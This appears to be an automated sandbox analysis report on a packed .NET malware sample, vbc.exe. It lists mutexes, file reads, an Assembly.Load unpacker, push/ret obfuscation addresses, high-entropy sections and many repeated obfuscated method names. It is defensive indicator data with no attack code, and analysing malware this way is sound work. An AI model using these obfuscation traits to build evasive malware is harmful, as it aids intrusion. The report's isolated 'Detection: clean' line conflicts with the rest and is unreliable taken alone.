Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: vbc.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: vbc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: vbc.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe
Source: Binary string: help.pdbGCTL source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp
Source: Binary string: help.pdb source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: vbc.exe, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: uZlkYhlkeLeaKC.exe.0.dr, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.5.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.2.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.7.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.9.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.3.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_006F7A49 push es; ret 0_2_006F7A74
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_006F72F5 push cs; retf 0_2_006F7302
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_006F8699 push es; ret 0_2_006F879A
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_006F7151 push cs; retf 0_2_006F72F4
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_006F87AD push es; ret 0_2_006F87B8
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_006F879B push es; ret 0_2_006F87AC
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FC95E5 push eax; retf 0_2_04FC95E6
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041B832 push eax; ret 8_2_0041B838
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041B83B push eax; ret 8_2_0041B8A2
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041B89C push eax; ret 8_2_0041B8A2
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00406907 push 00000060h; retf 8_2_0040691C
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041A11B push ecx; ret 8_2_0041A11C
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041A3BA pushfd ; ret 8_2_0041A3BB
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_004154EE pushad ; retf 8_2_004154F0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00419E43 push 0000007Eh; iretd 8_2_00419E45
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0040EFC6 push cs; ret 8_2_0040EFCC
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041B7E5 push eax; ret 8_2_0041B838
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00D17151 push cs; retf 8_2_00D172F4
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00D172F5 push cs; retf 8_2_00D17302
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00D17A49 push es; ret 8_2_00D17A74
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00D18699 push es; ret 8_2_00D1879A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00D1879B push es; ret 8_2_00D187AC
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00D187AD push es; ret 8_2_00D187B8
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0184D0D1 push ecx; ret 8_2_0184D0E4
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B5A3BA pushfd ; ret 20_2_02B5A3BB
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B5B89C push eax; ret 20_2_02B5B8A2
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B5B832 push eax; ret 20_2_02B5B838
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B5B83B push eax; ret 20_2_02B5B8A2
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B5A11B push ecx; ret 20_2_02B5A11C
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B46907 push 00000060h; retf 20_2_02B4691C
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B59E43 push 0000007Eh; iretd 20_2_02B59E45
Source: initial sample Static PE information: section name: .text entropy: 7.9203967863
Source: initial sample Static PE information: section name: .text entropy: 7.9203967863
Source: vbc.exe, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: vbc.exe, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: vbc.exe, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: vbc.exe, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: vbc.exe, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: vbc.exe, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: vbc.exe, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: vbc.exe, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: uZlkYhlkeLeaKC.exe.0.dr, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: uZlkYhlkeLeaKC.exe.0.dr, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: uZlkYhlkeLeaKC.exe.0.dr, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: uZlkYhlkeLeaKC.exe.0.dr, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: uZlkYhlkeLeaKC.exe.0.dr, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: uZlkYhlkeLeaKC.exe.0.dr, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: uZlkYhlkeLeaKC.exe.0.dr, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: uZlkYhlkeLeaKC.exe.0.dr, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 0.2.vbc.exe.6f0000.0.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 0.2.vbc.exe.6f0000.0.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 0.2.vbc.exe.6f0000.0.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 0.2.vbc.exe.6f0000.0.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 0.2.vbc.exe.6f0000.0.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 0.2.vbc.exe.6f0000.0.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 0.2.vbc.exe.6f0000.0.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 0.2.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 0.0.vbc.exe.6f0000.0.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 0.0.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 0.0.vbc.exe.6f0000.0.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 0.0.vbc.exe.6f0000.0.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 0.0.vbc.exe.6f0000.0.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 0.0.vbc.exe.6f0000.0.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 0.0.vbc.exe.6f0000.0.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 0.0.vbc.exe.6f0000.0.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.5.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.5.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.5.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.5.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.5.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.5.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.5.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.5.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.2.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.2.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.2.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.2.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.2.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.2.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.2.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.2.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.7.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.7.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.7.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.7.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.7.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.7.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.7.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
